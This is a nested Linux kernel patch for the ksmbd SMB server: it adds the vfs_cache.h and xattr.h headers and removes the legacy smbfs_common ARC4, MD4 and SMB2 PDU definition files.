++	filp_cache = kmem_cache_create("ksmbd_file_cache",
++				       sizeof(struct ksmbd_file), 0,
++				       SLAB_HWCACHE_ALIGN, NULL);
++	if (!filp_cache)
++		goto out;
++
++	return 0;
++
++out:
++	pr_err("failed to allocate file cache\n");
++	return -ENOMEM;
++}
++
++void ksmbd_exit_file_cache(void)
++{
++	kmem_cache_destroy(filp_cache);
++}
+diff --git a/fs/smb/server/vfs_cache.h b/fs/smb/server/vfs_cache.h
+new file mode 100644
+index 0000000000000..fcb13413fa8d9
+--- /dev/null
++++ b/fs/smb/server/vfs_cache.h
+@@ -0,0 +1,166 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __VFS_CACHE_H__
++#define __VFS_CACHE_H__
++
++#include <linux/file.h>
++#include <linux/fs.h>
++#include <linux/rwsem.h>
++#include <linux/spinlock.h>
++#include <linux/idr.h>
++#include <linux/workqueue.h>
++
++#include "vfs.h"
++
++/* Windows style file permissions for extended response */
++#define	FILE_GENERIC_ALL	0x1F01FF
++#define	FILE_GENERIC_READ	0x120089
++#define	FILE_GENERIC_WRITE	0x120116
++#define	FILE_GENERIC_EXECUTE	0x1200a0
++
++#define KSMBD_START_FID		0
++#define KSMBD_NO_FID		(INT_MAX)
++#define SMB2_NO_FID		(0xFFFFFFFFFFFFFFFFULL)
++
++struct ksmbd_conn;
++struct ksmbd_session;
++
++struct ksmbd_lock {
++	struct file_lock *fl;
++	struct list_head clist;
++	struct list_head flist;
++	struct list_head llist;
++	unsigned int flags;
++	int cmd;
++	int zero_len;
++	unsigned long long start;
++	unsigned long long end;
++};
++
++struct stream {
++	char *name;
++	ssize_t size;
++};
++
++struct ksmbd_inode {
++	rwlock_t			m_lock;
++	atomic_t			m_count;
++	atomic_t			op_count;
++	/* opinfo count for streams */
++	atomic_t			sop_count;
++	struct inode			*m_inode;
++	unsigned int			m_flags;
++	struct hlist_node		m_hash;
++	struct list_head		m_fp_list;
++	struct list_head		m_op_list;
++	struct oplock_info		*m_opinfo;
++	__le32				m_fattr;
++};
++
++struct ksmbd_file {
++	struct file			*filp;
++	u64				persistent_id;
++	u64				volatile_id;
++
++	spinlock_t			f_lock;
++
++	struct ksmbd_inode		*f_ci;
++	struct ksmbd_inode		*f_parent_ci;
++	struct oplock_info __rcu	*f_opinfo;
++	struct ksmbd_conn		*conn;
++	struct ksmbd_tree_connect	*tcon;
++
++	atomic_t			refcount;
++	__le32				daccess;
++	__le32				saccess;
++	__le32				coption;
++	__le32				cdoption;
++	__u64				create_time;
++	__u64				itime;
++
++	bool				is_nt_open;
++	bool				attrib_only;
++
++	char				client_guid[16];
++	char				create_guid[16];
++	char				app_instance_id[16];
++
++	struct stream			stream;
++	struct list_head		node;
++	struct list_head		blocked_works;
++	struct list_head		lock_list;
++
++	int				durable_timeout;
++
++	/* valid while a directory listing (ls) is in progress */
++	struct ksmbd_readdir_data	readdir_data;
++	int				dot_dotdot[2];
++};
++
++static inline void set_ctx_actor(struct dir_context *ctx,
++				 filldir_t actor)
++{
++	ctx->actor = actor;
++}
++
++#define KSMBD_NR_OPEN_DEFAULT BITS_PER_LONG
++
++struct ksmbd_file_table {
++	rwlock_t		lock;
++	struct idr		*idr;
++};
++
++static inline bool has_file_id(u64 id)
++{
++	return id < KSMBD_NO_FID;
++}
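++
++/*
++ * Note that both sentinels fail this check: KSMBD_NO_FID is not less
++ * than itself, and SMB2_NO_FID (all 0xFF) is larger still.
++ */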
++
++static inline bool ksmbd_stream_fd(struct ksmbd_file *fp)
++{
++	return fp->stream.name != NULL;
++}
++
++int ksmbd_init_file_table(struct ksmbd_file_table *ft);
++void ksmbd_destroy_file_table(struct ksmbd_file_table *ft);
++int ksmbd_close_fd(struct ksmbd_work *work, u64 id);
++struct ksmbd_file *ksmbd_lookup_fd_fast(struct ksmbd_work *work, u64 id);
++struct ksmbd_file *ksmbd_lookup_foreign_fd(struct ksmbd_work *work, u64 id);
++struct ksmbd_file *ksmbd_lookup_fd_slow(struct ksmbd_work *work, u64 id,
++					u64 pid);
++void ksmbd_fd_put(struct ksmbd_work *work, struct ksmbd_file *fp);
++struct ksmbd_file *ksmbd_lookup_durable_fd(unsigned long long id);
++struct ksmbd_file *ksmbd_lookup_fd_cguid(char *cguid);
++struct ksmbd_file *ksmbd_lookup_fd_inode(struct inode *inode);
++unsigned int ksmbd_open_durable_fd(struct ksmbd_file *fp);
++struct ksmbd_file *ksmbd_open_fd(struct ksmbd_work *work, struct file *filp);
++void ksmbd_close_tree_conn_fds(struct ksmbd_work *work);
++void ksmbd_close_session_fds(struct ksmbd_work *work);
++int ksmbd_close_inode_fds(struct ksmbd_work *work, struct inode *inode);
++int ksmbd_init_global_file_table(void);
++void ksmbd_free_global_file_table(void);
++void ksmbd_set_fd_limit(unsigned long limit);
++
++/*
++ * INODE hash
++ */
++int __init ksmbd_inode_hash_init(void);
++void ksmbd_release_inode_hash(void);
++
++enum KSMBD_INODE_STATUS {
++	KSMBD_INODE_STATUS_OK,
++	KSMBD_INODE_STATUS_UNKNOWN,
++	KSMBD_INODE_STATUS_PENDING_DELETE,
++};
++
++int ksmbd_query_inode_status(struct inode *inode);
++bool ksmbd_inode_pending_delete(struct ksmbd_file *fp);
++void ksmbd_set_inode_pending_delete(struct ksmbd_file *fp);
++void ksmbd_clear_inode_pending_delete(struct ksmbd_file *fp);
++void ksmbd_fd_set_delete_on_close(struct ksmbd_file *fp,
++				  int file_info);
++int ksmbd_init_file_cache(void);
++void ksmbd_exit_file_cache(void);
++#endif /* __VFS_CACHE_H__ */
+diff --git a/fs/smb/server/xattr.h b/fs/smb/server/xattr.h
+new file mode 100644
+index 0000000000000..16499ca5c82d3
+--- /dev/null
++++ b/fs/smb/server/xattr.h
+@@ -0,0 +1,122 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2021 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __XATTR_H__
++#define __XATTR_H__
++
++/*
++ * These are on-disk structures that store additional metadata in xattrs
++ * to reproduce windows filesystem semantics. They are encoded with NDR
++ * to be compatible with samba's xattr metadata format. Compatibility
++ * with samba matters because information (file attributes, creation
++ * time, ACLs) about existing files would otherwise be lost when
++ * switching between ksmbd and samba.
++ */
++
++/*
++ * Dos attribute flags; each bit marks which field below is valid.
++ */
++enum {
++	XATTR_DOSINFO_ATTRIB		= 0x00000001,
++	XATTR_DOSINFO_EA_SIZE		= 0x00000002,
++	XATTR_DOSINFO_SIZE		= 0x00000004,
++	XATTR_DOSINFO_ALLOC_SIZE	= 0x00000008,
++	XATTR_DOSINFO_CREATE_TIME	= 0x00000010,
++	XATTR_DOSINFO_CHANGE_TIME	= 0x00000020,
++	XATTR_DOSINFO_ITIME		= 0x00000040
++};
++
++/*
++ * Dos attribute structure, compatible with samba's equivalent.
++ * Storing it in the xattr named "DOSATTRIB", separately from the inode,
++ * allows ksmbd to faithfully reproduce windows filesystem semantics
++ * on top of a POSIX filesystem.
++ */
++struct xattr_dos_attrib {
++	__u16	version;	/* version 3 or version 4 */
++	__u32	flags;		/* valid flags */
++	__u32	attr;		/* Dos attribute */
++	__u32	ea_size;	/* EA size */
++	__u64	size;
++	__u64	alloc_size;
++	__u64	create_time;	/* File creation time */
++	__u64	change_time;	/* File change time */
++	__u64	itime;		/* Invented/Initial time */
++};
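++
++/*
++ * For example, an entry recording only the DOS attribute bits and the
++ * creation time would set flags to
++ * XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME and leave the other
++ * fields zeroed.
++ */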
++
++/*
++ * Enumeration used for computing the posix acl hash.
++ */
++enum {
++	SMB_ACL_TAG_INVALID = 0,
++	SMB_ACL_USER,
++	SMB_ACL_USER_OBJ,
++	SMB_ACL_GROUP,
++	SMB_ACL_GROUP_OBJ,
++	SMB_ACL_OTHER,
++	SMB_ACL_MASK
++};
++
++#define SMB_ACL_READ			4
++#define SMB_ACL_WRITE			2
++#define SMB_ACL_EXECUTE			1
++
++struct xattr_acl_entry {
++	int type;
++	uid_t uid;
++	gid_t gid;
++	mode_t perm;
++};
++
++/*
++ * xattr_smb_acl structure is used for computing posix acl hash.
++ */
++struct xattr_smb_acl {
++	int count;
++	int next;
++	struct xattr_acl_entry entries[];
++};
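++
++/*
++ * An instance holding N entries is sized roughly as
++ * sizeof(struct xattr_smb_acl) + N * sizeof(struct xattr_acl_entry),
++ * with ->count set to N.
++ */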
++
++/* the 64-byte hash in xattr_ntacl is computed with sha256 */
++#define XATTR_SD_HASH_TYPE_SHA256	0x1
++#define XATTR_SD_HASH_SIZE		64
++
++/*
++ * xattr_ntacl stores the ntacl together with hashes.
++ * The hashes are used to verify that the posix acl and ntacl in the
++ * xattr are still valid.
++ */
++struct xattr_ntacl {
++	__u16	version; /* version 4 */
++	void	*sd_buf;
++	__u32	sd_size;
++	__u16	hash_type; /* hash type */
++	__u8	desc[10]; /* posix_acl description */
++	__u16	desc_len;
++	__u64	current_time;
++	__u8	hash[XATTR_SD_HASH_SIZE]; /* 64-byte hash for ntacl */
++	__u8	posix_acl_hash[XATTR_SD_HASH_SIZE]; /* 64-byte hash for posix acl */
++};
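++
++/*
++ * The idea is that a reader recomputes the hash of the current posix
++ * acl and compares it with ->posix_acl_hash; a mismatch means the acl
++ * changed outside ksmbd, so the stored ntacl is stale.
++ */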
++
++/* DOS ATTRIBUTE XATTR PREFIX */
++#define DOS_ATTRIBUTE_PREFIX		"DOSATTRIB"
++#define DOS_ATTRIBUTE_PREFIX_LEN	(sizeof(DOS_ATTRIBUTE_PREFIX) - 1)
++#define XATTR_NAME_DOS_ATTRIBUTE	(XATTR_USER_PREFIX DOS_ATTRIBUTE_PREFIX)
++#define XATTR_NAME_DOS_ATTRIBUTE_LEN	\
++		(sizeof(XATTR_USER_PREFIX DOS_ATTRIBUTE_PREFIX) - 1)
++
++/* STREAM XATTR PREFIX */
++#define STREAM_PREFIX			"DosStream."
++#define STREAM_PREFIX_LEN		(sizeof(STREAM_PREFIX) - 1)
++#define XATTR_NAME_STREAM		(XATTR_USER_PREFIX STREAM_PREFIX)
++#define XATTR_NAME_STREAM_LEN		(sizeof(XATTR_NAME_STREAM) - 1)
++
++/* SECURITY DESCRIPTOR(NTACL) XATTR PREFIX */
++#define SD_PREFIX			"NTACL"
++#define SD_PREFIX_LEN	(sizeof(SD_PREFIX) - 1)
++#define XATTR_NAME_SD	(XATTR_SECURITY_PREFIX SD_PREFIX)
++#define XATTR_NAME_SD_LEN	\
++		(sizeof(XATTR_SECURITY_PREFIX SD_PREFIX) - 1)
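++
++/*
++ * For reference, with the kernel's standard xattr prefixes ("user."
++ * and "security.") the composed names above are:
++ *
++ *	XATTR_NAME_DOS_ATTRIBUTE -> "user.DOSATTRIB"
++ *	XATTR_NAME_STREAM        -> "user.DosStream."
++ *	XATTR_NAME_SD            -> "security.NTACL"
++ */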
++
++#endif /* __XATTR_H__ */
+diff --git a/fs/smbfs_common/Makefile b/fs/smbfs_common/Makefile
+deleted file mode 100644
+index cafc61a3bfc37..0000000000000
+--- a/fs/smbfs_common/Makefile
++++ /dev/null
+@@ -1,7 +0,0 @@
+-# SPDX-License-Identifier: GPL-2.0-only
+-#
+-# Makefile for Linux filesystem routines that are shared by client and server.
+-#
+-
+-obj-$(CONFIG_SMBFS_COMMON) += cifs_arc4.o
+-obj-$(CONFIG_SMBFS_COMMON) += cifs_md4.o
+diff --git a/fs/smbfs_common/arc4.h b/fs/smbfs_common/arc4.h
+deleted file mode 100644
+index 12e71ec033a18..0000000000000
+--- a/fs/smbfs_common/arc4.h
++++ /dev/null
+@@ -1,23 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0+ */
+-/*
+- * Common values for ARC4 Cipher Algorithm
+- */
+-
+-#ifndef _CRYPTO_ARC4_H
+-#define _CRYPTO_ARC4_H
+-
+-#include <linux/types.h>
+-
+-#define ARC4_MIN_KEY_SIZE	1
+-#define ARC4_MAX_KEY_SIZE	256
+-#define ARC4_BLOCK_SIZE		1
+-
+-struct arc4_ctx {
+-	u32 S[256];
+-	u32 x, y;
+-};
+-
+-int cifs_arc4_setkey(struct arc4_ctx *ctx, const u8 *in_key, unsigned int key_len);
+-void cifs_arc4_crypt(struct arc4_ctx *ctx, u8 *out, const u8 *in, unsigned int len);
+-
+-#endif /* _CRYPTO_ARC4_H */
+diff --git a/fs/smbfs_common/cifs_arc4.c b/fs/smbfs_common/cifs_arc4.c
+deleted file mode 100644
+index 043e4cb839fa2..0000000000000
+--- a/fs/smbfs_common/cifs_arc4.c
++++ /dev/null
+@@ -1,74 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * Cryptographic API
+- *
+- * ARC4 Cipher Algorithm
+- *
+- * Jon Oberheide <jon@oberheide.org>
+- */
+-
+-#include <linux/module.h>
+-#include "arc4.h"
+-
+-MODULE_LICENSE("GPL");
+-
+-int cifs_arc4_setkey(struct arc4_ctx *ctx, const u8 *in_key, unsigned int key_len)
+-{
+-	int i, j = 0, k = 0;
+-
+-	ctx->x = 1;
+-	ctx->y = 0;
+-
+-	for (i = 0; i < 256; i++)
+-		ctx->S[i] = i;
+-
+-	for (i = 0; i < 256; i++) {
+-		u32 a = ctx->S[i];
+-
+-		j = (j + in_key[k] + a) & 0xff;
+-		ctx->S[i] = ctx->S[j];
+-		ctx->S[j] = a;
+-		if (++k >= key_len)
+-			k = 0;
+-	}
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(cifs_arc4_setkey);
+-
+-void cifs_arc4_crypt(struct arc4_ctx *ctx, u8 *out, const u8 *in, unsigned int len)
+-{
+-	u32 *const S = ctx->S;
+-	u32 x, y, a, b;
+-	u32 ty, ta, tb;
+-
+-	if (len == 0)
+-		return;
+-
+-	x = ctx->x;
+-	y = ctx->y;
+-
+-	a = S[x];
+-	y = (y + a) & 0xff;
+-	b = S[y];
+-
+-	do {
+-		S[y] = a;
+-		a = (a + b) & 0xff;
+-		S[x] = b;
+-		x = (x + 1) & 0xff;
+-		ta = S[x];
+-		ty = (y + ta) & 0xff;
+-		tb = S[ty];
+-		*out++ = *in++ ^ S[a];
+-		if (--len == 0)
+-			break;
+-		y = ty;
+-		a = ta;
+-		b = tb;
+-	} while (true);
+-
+-	ctx->x = x;
+-	ctx->y = y;
+-}
+-EXPORT_SYMBOL_GPL(cifs_arc4_crypt);
+diff --git a/fs/smbfs_common/cifs_md4.c b/fs/smbfs_common/cifs_md4.c
+deleted file mode 100644
+index 50f78cfc6ce92..0000000000000
+--- a/fs/smbfs_common/cifs_md4.c
++++ /dev/null
+@@ -1,197 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- * Cryptographic API.
+- *
+- * MD4 Message Digest Algorithm (RFC1320).
+- *
+- * Implementation derived from Andrew Tridgell and Steve French's
+- * CIFS MD4 implementation, and the cryptoapi implementation
+- * originally based on the public domain implementation written
+- * by Colin Plumb in 1993.
+- *
+- * Copyright (c) Andrew Tridgell 1997-1998.
+- * Modified by Steve French (sfrench@us.ibm.com) 2002
+- * Copyright (c) Cryptoapi developers.
+- * Copyright (c) 2002 David S. Miller (davem@redhat.com)
+- * Copyright (c) 2002 James Morris <jmorris@intercode.com.au>
+- *
+- */
+-#include <linux/init.h>
+-#include <linux/kernel.h>
+-#include <linux/module.h>
+-#include <linux/string.h>
+-#include <linux/types.h>
+-#include <asm/byteorder.h>
+-#include "md4.h"
+-
+-MODULE_LICENSE("GPL");
+-
+-static inline u32 lshift(u32 x, unsigned int s)
+-{
+-	x &= 0xFFFFFFFF;
+-	return ((x << s) & 0xFFFFFFFF) | (x >> (32 - s));
+-}
+-
+-static inline u32 F(u32 x, u32 y, u32 z)
+-{
+-	return (x & y) | ((~x) & z);
+-}
+-
+-static inline u32 G(u32 x, u32 y, u32 z)
+-{
+-	return (x & y) | (x & z) | (y & z);
+-}
+-
+-static inline u32 H(u32 x, u32 y, u32 z)
+-{
+-	return x ^ y ^ z;
+-}
+-
+-#define ROUND1(a,b,c,d,k,s) (a = lshift(a + F(b,c,d) + k, s))
+-#define ROUND2(a,b,c,d,k,s) (a = lshift(a + G(b,c,d) + k + (u32)0x5A827999,s))
+-#define ROUND3(a,b,c,d,k,s) (a = lshift(a + H(b,c,d) + k + (u32)0x6ED9EBA1,s))
+-
+-static void md4_transform(u32 *hash, u32 const *in)
+-{
+-	u32 a, b, c, d;
+-
+-	a = hash[0];
+-	b = hash[1];
+-	c = hash[2];
+-	d = hash[3];
+-
+-	ROUND1(a, b, c, d, in[0], 3);
+-	ROUND1(d, a, b, c, in[1], 7);
+-	ROUND1(c, d, a, b, in[2], 11);
+-	ROUND1(b, c, d, a, in[3], 19);
+-	ROUND1(a, b, c, d, in[4], 3);
+-	ROUND1(d, a, b, c, in[5], 7);
+-	ROUND1(c, d, a, b, in[6], 11);
+-	ROUND1(b, c, d, a, in[7], 19);
+-	ROUND1(a, b, c, d, in[8], 3);
+-	ROUND1(d, a, b, c, in[9], 7);
+-	ROUND1(c, d, a, b, in[10], 11);
+-	ROUND1(b, c, d, a, in[11], 19);
+-	ROUND1(a, b, c, d, in[12], 3);
+-	ROUND1(d, a, b, c, in[13], 7);
+-	ROUND1(c, d, a, b, in[14], 11);
+-	ROUND1(b, c, d, a, in[15], 19);
+-
+-	ROUND2(a, b, c, d, in[0], 3);
+-	ROUND2(d, a, b, c, in[4], 5);
+-	ROUND2(c, d, a, b, in[8], 9);
+-	ROUND2(b, c, d, a, in[12], 13);
+-	ROUND2(a, b, c, d, in[1], 3);
+-	ROUND2(d, a, b, c, in[5], 5);
+-	ROUND2(c, d, a, b, in[9], 9);
+-	ROUND2(b, c, d, a, in[13], 13);
+-	ROUND2(a, b, c, d, in[2], 3);
+-	ROUND2(d, a, b, c, in[6], 5);
+-	ROUND2(c, d, a, b, in[10], 9);
+-	ROUND2(b, c, d, a, in[14], 13);
+-	ROUND2(a, b, c, d, in[3], 3);
+-	ROUND2(d, a, b, c, in[7], 5);
+-	ROUND2(c, d, a, b, in[11], 9);
+-	ROUND2(b, c, d, a, in[15], 13);
+-
+-	ROUND3(a, b, c, d, in[0], 3);
+-	ROUND3(d, a, b, c, in[8], 9);
+-	ROUND3(c, d, a, b, in[4], 11);
+-	ROUND3(b, c, d, a, in[12], 15);
+-	ROUND3(a, b, c, d, in[2], 3);
+-	ROUND3(d, a, b, c, in[10], 9);
+-	ROUND3(c, d, a, b, in[6], 11);
+-	ROUND3(b, c, d, a, in[14], 15);
+-	ROUND3(a, b, c, d, in[1], 3);
+-	ROUND3(d, a, b, c, in[9], 9);
+-	ROUND3(c, d, a, b, in[5], 11);
+-	ROUND3(b, c, d, a, in[13], 15);
+-	ROUND3(a, b, c, d, in[3], 3);
+-	ROUND3(d, a, b, c, in[11], 9);
+-	ROUND3(c, d, a, b, in[7], 11);
+-	ROUND3(b, c, d, a, in[15], 15);
+-
+-	hash[0] += a;
+-	hash[1] += b;
+-	hash[2] += c;
+-	hash[3] += d;
+-}
+-
+-static inline void md4_transform_helper(struct md4_ctx *ctx)
+-{
+-	le32_to_cpu_array(ctx->block, ARRAY_SIZE(ctx->block));
+-	md4_transform(ctx->hash, ctx->block);
+-}
+-
+-int cifs_md4_init(struct md4_ctx *mctx)
+-{
+-	memset(mctx, 0, sizeof(struct md4_ctx));
+-	mctx->hash[0] = 0x67452301;
+-	mctx->hash[1] = 0xefcdab89;
+-	mctx->hash[2] = 0x98badcfe;
+-	mctx->hash[3] = 0x10325476;
+-	mctx->byte_count = 0;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(cifs_md4_init);
+-
+-int cifs_md4_update(struct md4_ctx *mctx, const u8 *data, unsigned int len)
+-{
+-	const u32 avail = sizeof(mctx->block) - (mctx->byte_count & 0x3f);
+-
+-	mctx->byte_count += len;
+-
+-	if (avail > len) {
+-		memcpy((char *)mctx->block + (sizeof(mctx->block) - avail),
+-		       data, len);
+-		return 0;
+-	}
+-
+-	memcpy((char *)mctx->block + (sizeof(mctx->block) - avail),
+-	       data, avail);
+-
+-	md4_transform_helper(mctx);
+-	data += avail;
+-	len -= avail;
+-
+-	while (len >= sizeof(mctx->block)) {
+-		memcpy(mctx->block, data, sizeof(mctx->block));
+-		md4_transform_helper(mctx);
+-		data += sizeof(mctx->block);
+-		len -= sizeof(mctx->block);
+-	}
+-
+-	memcpy(mctx->block, data, len);
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(cifs_md4_update);
+-
+-int cifs_md4_final(struct md4_ctx *mctx, u8 *out)
+-{
+-	const unsigned int offset = mctx->byte_count & 0x3f;
+-	char *p = (char *)mctx->block + offset;
+-	int padding = 56 - (offset + 1);
+-
+-	*p++ = 0x80;
+-	if (padding < 0) {
+-		memset(p, 0x00, padding + sizeof(u64));
+-		md4_transform_helper(mctx);
+-		p = (char *)mctx->block;
+-		padding = 56;
+-	}
+-
+-	memset(p, 0, padding);
+-	mctx->block[14] = mctx->byte_count << 3;
+-	mctx->block[15] = mctx->byte_count >> 29;
+-	le32_to_cpu_array(mctx->block, (sizeof(mctx->block) -
+-			  sizeof(u64)) / sizeof(u32));
+-	md4_transform(mctx->hash, mctx->block);
+-	cpu_to_le32_array(mctx->hash, ARRAY_SIZE(mctx->hash));
+-	memcpy(out, mctx->hash, sizeof(mctx->hash));
+-	memset(mctx, 0, sizeof(*mctx));
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(cifs_md4_final);
+diff --git a/fs/smbfs_common/md4.h b/fs/smbfs_common/md4.h
+deleted file mode 100644
+index 5337becc699ab..0000000000000
+--- a/fs/smbfs_common/md4.h
++++ /dev/null
+@@ -1,27 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0+ */
+-/*
+- * Common values for MD4 Message Digest Algorithm
+- */
+-
+-#ifndef _CIFS_MD4_H
+-#define _CIFS_MD4_H
+-
+-#include <linux/types.h>
+-
+-#define MD4_DIGEST_SIZE		16
+-#define MD4_HMAC_BLOCK_SIZE	64
+-#define MD4_BLOCK_WORDS		16
+-#define MD4_HASH_WORDS		4
+-
+-struct md4_ctx {
+-	u32 hash[MD4_HASH_WORDS];
+-	u32 block[MD4_BLOCK_WORDS];
+-	u64 byte_count;
+-};
+-
+-
+-int cifs_md4_init(struct md4_ctx *mctx);
+-int cifs_md4_update(struct md4_ctx *mctx, const u8 *data, unsigned int len);
+-int cifs_md4_final(struct md4_ctx *mctx, u8 *out);
+-
+-#endif /* _CIFS_MD4_H */
+diff --git a/fs/smbfs_common/smb2pdu.h b/fs/smbfs_common/smb2pdu.h
+deleted file mode 100644
+index 7d605db3bb3b9..0000000000000
+--- a/fs/smbfs_common/smb2pdu.h
++++ /dev/null
+@@ -1,1702 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-#ifndef _COMMON_SMB2PDU_H
+-#define _COMMON_SMB2PDU_H
+-
+-/*
+- * Note that, due to trying to use names similar to the protocol specifications,
+- * there are many mixed case field names in the structures below.  Although
+- * this does not match typical Linux kernel style, it is necessary to be
+- * able to match against the protocol specification.
+- *
+- * SMB2 commands
+- * Some commands have minimal (wct=0,bcc=0), or uninteresting, responses
+- * (ie no useful data other than the SMB error code itself) and are marked such.
+- * Knowing this helps avoid response buffer allocations and copy in some cases.
+- */
+-
+-/* List of commands in host endian */
+-#define SMB2_NEGOTIATE_HE	0x0000
+-#define SMB2_SESSION_SETUP_HE	0x0001
+-#define SMB2_LOGOFF_HE		0x0002 /* trivial request/resp */
+-#define SMB2_TREE_CONNECT_HE	0x0003
+-#define SMB2_TREE_DISCONNECT_HE	0x0004 /* trivial req/resp */
+-#define SMB2_CREATE_HE		0x0005
+-#define SMB2_CLOSE_HE		0x0006
+-#define SMB2_FLUSH_HE		0x0007 /* trivial resp */
+-#define SMB2_READ_HE		0x0008
+-#define SMB2_WRITE_HE		0x0009
+-#define SMB2_LOCK_HE		0x000A
+-#define SMB2_IOCTL_HE		0x000B
+-#define SMB2_CANCEL_HE		0x000C
+-#define SMB2_ECHO_HE		0x000D
+-#define SMB2_QUERY_DIRECTORY_HE	0x000E
+-#define SMB2_CHANGE_NOTIFY_HE	0x000F
+-#define SMB2_QUERY_INFO_HE	0x0010
+-#define SMB2_SET_INFO_HE	0x0011
+-#define SMB2_OPLOCK_BREAK_HE	0x0012
+-
+-/* The same list in little endian */
+-#define SMB2_NEGOTIATE		cpu_to_le16(SMB2_NEGOTIATE_HE)
+-#define SMB2_SESSION_SETUP	cpu_to_le16(SMB2_SESSION_SETUP_HE)
+-#define SMB2_LOGOFF		cpu_to_le16(SMB2_LOGOFF_HE)
+-#define SMB2_TREE_CONNECT	cpu_to_le16(SMB2_TREE_CONNECT_HE)
+-#define SMB2_TREE_DISCONNECT	cpu_to_le16(SMB2_TREE_DISCONNECT_HE)
+-#define SMB2_CREATE		cpu_to_le16(SMB2_CREATE_HE)
+-#define SMB2_CLOSE		cpu_to_le16(SMB2_CLOSE_HE)
+-#define SMB2_FLUSH		cpu_to_le16(SMB2_FLUSH_HE)
+-#define SMB2_READ		cpu_to_le16(SMB2_READ_HE)
+-#define SMB2_WRITE		cpu_to_le16(SMB2_WRITE_HE)
+-#define SMB2_LOCK		cpu_to_le16(SMB2_LOCK_HE)
+-#define SMB2_IOCTL		cpu_to_le16(SMB2_IOCTL_HE)
+-#define SMB2_CANCEL		cpu_to_le16(SMB2_CANCEL_HE)
+-#define SMB2_ECHO		cpu_to_le16(SMB2_ECHO_HE)
+-#define SMB2_QUERY_DIRECTORY	cpu_to_le16(SMB2_QUERY_DIRECTORY_HE)
+-#define SMB2_CHANGE_NOTIFY	cpu_to_le16(SMB2_CHANGE_NOTIFY_HE)
+-#define SMB2_QUERY_INFO		cpu_to_le16(SMB2_QUERY_INFO_HE)
+-#define SMB2_SET_INFO		cpu_to_le16(SMB2_SET_INFO_HE)
+-#define SMB2_OPLOCK_BREAK	cpu_to_le16(SMB2_OPLOCK_BREAK_HE)
+-
+-#define SMB2_INTERNAL_CMD	cpu_to_le16(0xFFFF)
+-
+-#define NUMBER_OF_SMB2_COMMANDS	0x0013
+-
+-/*
+- * Size of the session key (crypto key encrypted with the password)
+- */
+-#define SMB2_NTLMV2_SESSKEY_SIZE	16
+-#define SMB2_SIGNATURE_SIZE		16
+-#define SMB2_HMACSHA256_SIZE		32
+-#define SMB2_CMACAES_SIZE		16
+-#define SMB3_GCM128_CRYPTKEY_SIZE	16
+-#define SMB3_GCM256_CRYPTKEY_SIZE	32
+-
+-/*
+- * Size of the smb3 encryption/decryption keys
+- * This size is big enough to store any cipher key types.
+- */
+-#define SMB3_ENC_DEC_KEY_SIZE		32
+-
+-/*
+- * Size of the smb3 signing key
+- */
+-#define SMB3_SIGN_KEY_SIZE		16
+-
+-#define CIFS_CLIENT_CHALLENGE_SIZE	8
+-
+-/* Maximum buffer size value we can send with 1 credit */
+-#define SMB2_MAX_BUFFER_SIZE 65536
+-
+-/*
+- * The default wsize is 1M for SMB2 (and for some CIFS cases).
+- * find_get_pages seems to return a maximum of 256
+- * pages in a single call. With PAGE_SIZE == 4k, this means we can
+- * fill a single wsize request with a single call.
+- */
+-#define SMB3_DEFAULT_IOSIZE (4 * 1024 * 1024)
+-
+-/*
+- * SMB2 Header Definition
+- *
+- * "MBZ" :  Must be Zero
+- * "BB"  :  BugBug, Something to check/review/analyze later
+- * "PDU" :  "Protocol Data Unit" (ie a network "frame")
+- *
+- */
+-
+-#define __SMB2_HEADER_STRUCTURE_SIZE	64
+-#define SMB2_HEADER_STRUCTURE_SIZE				\
+-	cpu_to_le16(__SMB2_HEADER_STRUCTURE_SIZE)
+-
+-#define SMB2_PROTO_NUMBER cpu_to_le32(0x424d53fe)
+-#define SMB2_TRANSFORM_PROTO_NUM cpu_to_le32(0x424d53fd)
+-#define SMB2_COMPRESSION_TRANSFORM_ID cpu_to_le32(0x424d53fc)
+-
+-/*
+- *	SMB2 flag definitions
+- */
+-#define SMB2_FLAGS_SERVER_TO_REDIR	cpu_to_le32(0x00000001)
+-#define SMB2_FLAGS_ASYNC_COMMAND	cpu_to_le32(0x00000002)
+-#define SMB2_FLAGS_RELATED_OPERATIONS	cpu_to_le32(0x00000004)
+-#define SMB2_FLAGS_SIGNED		cpu_to_le32(0x00000008)
+-#define SMB2_FLAGS_PRIORITY_MASK	cpu_to_le32(0x00000070) /* SMB3.1.1 */
+-#define SMB2_FLAGS_DFS_OPERATIONS	cpu_to_le32(0x10000000)
+-#define SMB2_FLAGS_REPLAY_OPERATION	cpu_to_le32(0x20000000) /* SMB3 & up */
+-
+-/*
+- *	Definitions for SMB2 Protocol Data Units (network frames)
+- *
+- *  See MS-SMB2.PDF specification for protocol details.
+- *  The Naming convention is the lower case version of the SMB2
+- *  command code name for the struct. Note that structures must be packed.
+- *
+- */
+-
+-/* See MS-SMB2 section 2.2.1 */
+-struct smb2_hdr {
+-	__le32 ProtocolId;	/* 0xFE 'S' 'M' 'B' */
+-	__le16 StructureSize;	/* 64 */
+-	__le16 CreditCharge;	/* MBZ */
+-	__le32 Status;		/* Error from server */
+-	__le16 Command;
+-	__le16 CreditRequest;	/* CreditResponse */
+-	__le32 Flags;
+-	__le32 NextCommand;
+-	__le64 MessageId;
+-	union {
+-		struct {
+-			__le32 ProcessId;
+-			__le32  TreeId;
+-		} __packed SyncId;
+-		__le64  AsyncId;
+-	} __packed Id;
+-	__le64  SessionId;
+-	__u8   Signature[16];
+-} __packed;
+-
+-struct smb2_pdu {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize2; /* size of wct area (varies, request specific) */
+-} __packed;
+-
